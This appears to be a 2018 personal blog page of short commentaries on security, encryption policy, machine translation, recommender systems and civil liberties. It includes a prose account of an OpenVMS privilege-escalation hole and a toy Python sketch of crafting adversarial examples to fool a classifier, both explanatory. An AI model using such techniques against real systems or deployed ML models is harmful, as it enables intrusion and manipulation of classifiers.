“Ghost in the DCL Shell: OpenVMS, Touted as Ultra Reliable, Had a Local Root Hole for 30 Years”
John Leyden, The Register, February 6, 2018
https://www.theregister.co.uk/2018/02/06/openvms_vulnerability/

VMS uses four modes: user mode; supervisor mode, where the DCL [Digital Command Language] shell runs; executive mode for privileged services; and kernel mode, which has power over the system.

VMS runs its shell in supervisor mode. A program can pass malformed command line data to DCL to process, which overflows a buffer and clobbers a return pointer in memory. There are some portions of memory with fixed addresses that all programs which run in a process share, and for some reason can hold executable code. Thus, it's possible to stash some malicious code in those shared areas, pass a booby-trapped command line to the shell to parse, and have the shell jump to the evil attacker-controlled code while still in supervisor mode. …

Furthermore, … the boundary between supervisor and executive mode is not as watertight as folks are led to believe. Thus, it is possible to leverage the escalation from user mode to supervisor mode to jump into the executive and drill deeper into the system.

#privilege-escalation #OpenVMS #buffer-overflows

Sharing Your Encryption Keys Undermines Security Guarantees

2018-02-06⊺15:13:39-06:00

Some of the bureaucrats in charge of the federal government's efforts to recruit and then punish domestic terrorists have been giving public speeches in which they advocate “responsible encryption.” It seems that encryption is an occasionally effective way for American citizens to protect their rights under the First, Fourth, Fifth, and Sixth Amendments against eavesdropping and unwarranted searches and seizures by government officials and their corporate accomplices. The G-men would prefer us to use only encryption systems that register plaintexts, keys, or both, either with service providers or with specialized escrow companies that can be relied on to yield our protected information to the authorities whenever they demand it.

A researcher at the Stanford Center for Internet and Society lists the ways in which such escrow systems undermine their users' security:

(A) There will be so many requests from counterterrorism and law-enforcement officials that the organization charged with the responsibilities of escrow will find it difficult to manage and restrict the distribution of their own keys:

The exceptional-access decryption key would have to be accessible by far more people than those currently entrusted with a software update signing key. That puts the key at risk, and also makes it harder to detect inappropriate use of the key. … Increasing frequency of use and the number of people with access unavoidably means increasing the risk of human error (such as carelessly storing or leaking the key) or malfeasance (such as an employee releasing the key to an unauthorized outside party in response to extortion or bribery).

(B) The organization charged with the responsibilities of escrow will find it difficult to reliably distinguish authentic requests for access to escrowed information from requests generated by attackers, particularly since counterterrorism and law-enforcement officials are likely to grow impatient with strict authentication procedures and look for ways to bypass them even when making legitimate requests.

(C) Attackers, knowing that a device uses an escrowed-key encryption mechanism, will seek out vulnerabilities related to the implementation of this mechanism:

The information the attacker obtains from the device could then be sold or otherwise exploited. That is, compromised devices would lead to identity theft, intellectual property misappropriation, industrial espionage, and other economic harms to American individuals and businesses. These are the very harms from which phone manufacturers are presently protecting Americans by strengthening their device encryption in recent years. An exceptional-access mandate would not only hurt U.S. smartphone manufacturers and app makers, it would end up taking a toll on other people and industries as well.

The premise is that end-to-end encryption systems are not subject to these particular vulnerabilities because they do not provide the access mechanisms (and so do not contain the hardware or software support) in which the vulnerabilities would be found.

(D) Users who want to protect their information can apply a second level of encryption, using a different key, before turning it over to the application that escrows its key, or use other techniques (such as steganography) to conceal information. Alternatively, such users can switch to apps made in free countries or develop their own, using free-software libraries that are already widely available. Any of these approaches would render the escrowed-key system pointless. (A sketch of the double-encryption workaround appears at the end of this entry.)

If the most commonly-used devices or messaging apps are exceptional access-compliant, then not only will the majority of bad actors — the average, unsophisticated criminals — be using weakened encryption, so will the majority of innocent people. By imposing an exceptional-access mandate, law enforcement officials charged with protecting the public would create a world wherein the shrewdest wrongdoers have better security than the innocents they victimize, who, in turn, would by law have worse smartphone and communications security than they do now, leaving them even more vulnerable to those same criminals.

“The Risks of ‘Responsible Encryption’”
Riana Pfefferkorn, Stanford Center for Internet and Society, February 5, 2018
https://cyberlaw.stanford.edu/files/publication/files/2018-02-05%20Technical%20Response%20to%20Rosenstein-Wray%20FINAL.pdf
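
Here is a minimal sketch of the double-encryption workaround mentioned in point (D), assuming the third-party cryptography package (my choice for illustration, not anything prescribed by the article): the correspondents encrypt the message under a key that is never escrowed, so whatever the escrowed-key application later surrenders to the authorities is itself ciphertext.

    # Apply a second layer of encryption, with a key the escrow system never
    # sees, before handing the message to the escrowed-key application.
    from cryptography.fernet import Fernet

    # A key shared privately between the correspondents and never escrowed.
    private_key = Fernet.generate_key()
    inner = Fernet(private_key)

    message = b"Meet at the usual place at noon."
    pre_encrypted = inner.encrypt(message)

    # The escrowed-key application transmits pre_encrypted. Even if the
    # authorities obtain the escrowed key and decrypt the transmission, they
    # recover only this inner ciphertext, not the message.
    print(pre_encrypted)

    # The recipient, who holds the private key, removes the inner layer.
    print(inner.decrypt(pre_encrypted))   # b'Meet at the usual place at noon.'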

#encryption #key-escrow #communications-security

The Role of Understanding in Translation

2018-02-05⊺14:35:17-06:00

The cognitive scientist Douglas R. Hofstadter has argued for many years that effective translation of any but the most pedestrian and constrained texts requires that the translator understand the text, its context, and its purpose. In this article, he reviews the current performance of Google Translate and concludes that massive text databases and machine-learning algorithms don't simulate this understanding well.

“The Shallowness of Google Translate”
Douglas Hofstadter, The Atlantic, January 30, 2018
https://www.theatlantic.com/technology/archive/2018/01/the-shallowness-of-google-translate/551570/

In Language Log, a professional Sinologist does a slightly deeper dive into one of Hofstadter's examples and suggests that Hofstadter is attacking a straw man.

“Don't Blame Google Translate”
Victor Mair, Language Log, February 4, 2018
http://languagelog.ldc.upenn.edu/nll/?p=36502

It is easy to find inadequacies in the GT translations, and Hofstadter does so systematically, but I don't think anyone in their right mind would expect a machine to do as good a job as a skilled, experienced, sensitive, creative human translator who knows both the source language and the target language well.

If GT and other machine translators are unable to do a perfect job, or even one that is close to what a skilled human translator is capable of, what are their purposes? I believe that they fulfill a useful function in giving us the gist of meaning of texts written in languages with which we are unfamiliar.

In defense of Hofstadter, I note that what prompted his investigation was his discovery that two of his friends, each fluent in the other's native language, nevertheless used Google Translate as an intermediary when corresponding by e-mail: They each wrote in their own native language, fed the message through Google Translate, and sent off the result.

Hofstadter commented:

How odd! Why would two intelligent people, each of whom spoke the other's language well, do this? My own experiences with machine-translation software had always led me to be highly skeptical about it. But my skepticism was clearly not shared by these two. Indeed, many thoughtful people are quite enamored of translation programs, finding little to criticize in them. This baffles me.

All of his examples are cases in which the machine-translation system has failed to render the main point of the passage, what Mair calls “the gist,” because it doesn't understand the passage. They are cases in which the system fails even at the minimal “useful function” that Mair identifies.

#machine-translation #Douglas-Hofstadter #Google-Translate

YouTube Gone Wild

2018-02-03⊺08:51:58-06:00

In the absence of explicit guidance from the user, the black-box decider inside YouTube that chooses and queues up the videos that it fancies you'll be most interested in seeing next tends to make recommendations that are progressively more bizarre and disturbing. Perhaps it has learned something about human nature, but more likely its selections are the video-recommender analogue of the luridly colored fantasy images that a black-box classifier constructs when directed to search for the pixel pattern that maximizes its response to a given search term such as “octopus” or “mouth” or “waterfall”.

The author of the article cited below suspects that the black-box decider's behavior reflects something sinister in its programming. It turns out, not too surprisingly, that many of the bizarre and disturbing videos that the decider eventually queues up are pro-Trump ads and clips of right-wing loons promoting conspiracy theories.

“‘Fiction Is Outperforming Reality’: How YouTube's Algorithm Distorts Truth”
Paul Lewis, The Guardian, February 2, 2018
https://www.theguardian.com/technology/2018/feb/02/how-youtubes-algorithm-distorts-truth

#black-box-deciders #YouTube #recommendation-systems

Defenses against Adversarial Examples Fail

2018-02-02⊺17:21:09-06:00

Several of the papers to be presented at this year's International Conference on Learning Representations propose strategies for blocking the construction of adversarial examples against machine-learning-based image-classification systems. The goal is to harden such systems enough to make them usable even in high-risk situations in which adversaries can select and control the inputs that the fully trained systems are expected to classify.

Once these post hoc defenses are incorporated into the systems, however, it is possible to devise more specialized attacks against them, resulting in new, even more robust adversarial examples:

“Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples”
Anish Athalye, Nicholas Carlini, and David Wagner, arXiv, February 1, 2018
https://arxiv.org/pdf/1802.00420.pdf

That's the full paper. If it's tl;dr, there's a summary here, with a cat picture that even well-defended classifiers consider to be guacamole.

“Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples”
Anish Athalye, Nicholas Carlini, and David Wagner, GitHub, February 2, 2018
https://github.com/anishathalye/obfuscated-gradients
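
For readers unfamiliar with the basic construction that these defenses are meant to block, here is a minimal sketch, using only numpy and a toy linear classifier rather than an image classifier (my simplification, not taken from the paper): a small per-coordinate perturbation chosen by following the gradient of the loss pushes the classifier's output sharply toward the opposite class.

    # A toy version of the gradient-sign construction of an adversarial example,
    # applied to a linear (logistic-regression) classifier.
    import numpy as np

    rng = np.random.default_rng(1)
    w = rng.normal(size=20)          # weights of an already-"trained" toy classifier
    b = 0.1

    def prob_class_1(x):
        return 1.0 / (1.0 + np.exp(-(w @ x + b)))

    x = rng.normal(size=20)                           # an ordinary input
    label = 1.0 if prob_class_1(x) >= 0.5 else 0.0    # take the classifier's own answer as correct

    # Gradient of the cross-entropy loss with respect to the input, and a small
    # step along its sign; each coordinate of x changes by at most epsilon.
    gradient = (prob_class_1(x) - label) * w
    epsilon = 0.25
    x_adversarial = x + epsilon * np.sign(gradient)

    print("original prediction   :", round(prob_class_1(x), 3))
    print("adversarial prediction:", round(prob_class_1(x_adversarial), 3))

Deep image classifiers are attacked in the same general way, except that the gradient is computed through the whole network and the perturbation is spread over thousands of pixels, which is why it can be made imperceptible to the human eye.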

#adversarial-examples #image-classifiers #machine-learning

Adversarial Speech-to-Text Examples: a Linguist's View

2018-02-02⊺16:24:18-06:00

A professional linguist examines a recent paper dealing with adversarial examples against speech-to-text systems created by machine-learning techniques. His conclusion is that, for some applications, the existence of adversarial examples won't make any difference, but they show that the speech-to-text systems are “brittle” and hence unsuitable in applications requiring any kind of fine discrimination or nonstandard input.

“Adversarial Attacks on Modern Speech-to-Text”
Max Little, Language Log, January 30, 2018
http://languagelog.ldc.upenn.edu/nll/?p=36447

For many commercial STT and associated user-centric applications this is mostly a curiosity. If I can order pizza and nearly always get it right in one take through Siri, I don't really see the problem here, even if it is obviously highly brittle. …

Nonetheless, I think this brittleness does have consequences. There will be critical uses for which this technology simply can't work. Specialised dictionaries may exist (e.g. clinical terminology) for which it may be almost impossible to obtain sufficient training data to make it useful. Poorly represented minority accents may cause it to fail. Stroke survivors and those with voice or speech impairments may be unable to use them. And there are attacks … in which a device is hacked remotely.

#speech-to-text #adversarial-examples #computational-linguistics

Kansas May Not Penalize Holders of Pro-Palestinian Opinions

2018-02-01⊺17:22:35-06:00

Good news! Some federal judges are still acquainted with the Constitution!

“In a Major Free Speech Victory, a Federal Court Strikes Down a Law That Punishes Supporters of Israel Boycott”
Glenn Greenwald, The Intercept, January 31, 2018
https://theintercept.com/2018/01/31/kansas-bds-law-free-speech/

The enjoined law, enacted last year by the Kansas legislature, requires all state contractors — as a prerequisite to receiving any paid work from the state — “to certify that they are not engaged in a boycott of Israel.” The month before the law was implemented, Esther Koontz, a Mennonite who works as a curriculum teacher for the Kansas public school system, decided that she would boycott goods made in Israel, motivated in part by a film she had seen detailing the abuse of Palestinians by the occupying Israeli government, and in part by a resolution enacted by the national Mennonite Church. …

A month after this law became effective, Koontz, having just completed a training program to teach new courses, was offered a position at a new Kansas school. But, as the court recounts, “the program director asked Ms. Koontz to sign a certification confirming that she was not participating in a boycott of Israel, as the Kansas Law requires.” Koontz ultimately replied that she was unable and unwilling to sign such an oath because she is, in fact, participating in a boycott of Israel. As a result, she was told that no contract could be signed with her.

In response to being denied this job due to her political views, Koontz retained the American Civil Liberties Union, which sued the commissioner of education, asking a federal court to enjoin enforcement of the law on the grounds that denying Koontz a job due to her boycotting of Israel violates her First Amendment rights. The court on Tuesday agreed and preliminarily enjoined enforcement of the law.

#freedom-of-speech #Boycott-Divestment-and-Sanctions #Kansas

This work is licensed under a Creative Commons Attribution-ShareAlike License.

John David Stone (havgl@unity.homelinux.net)

created June 1, 2014 · last revised December 10, 2018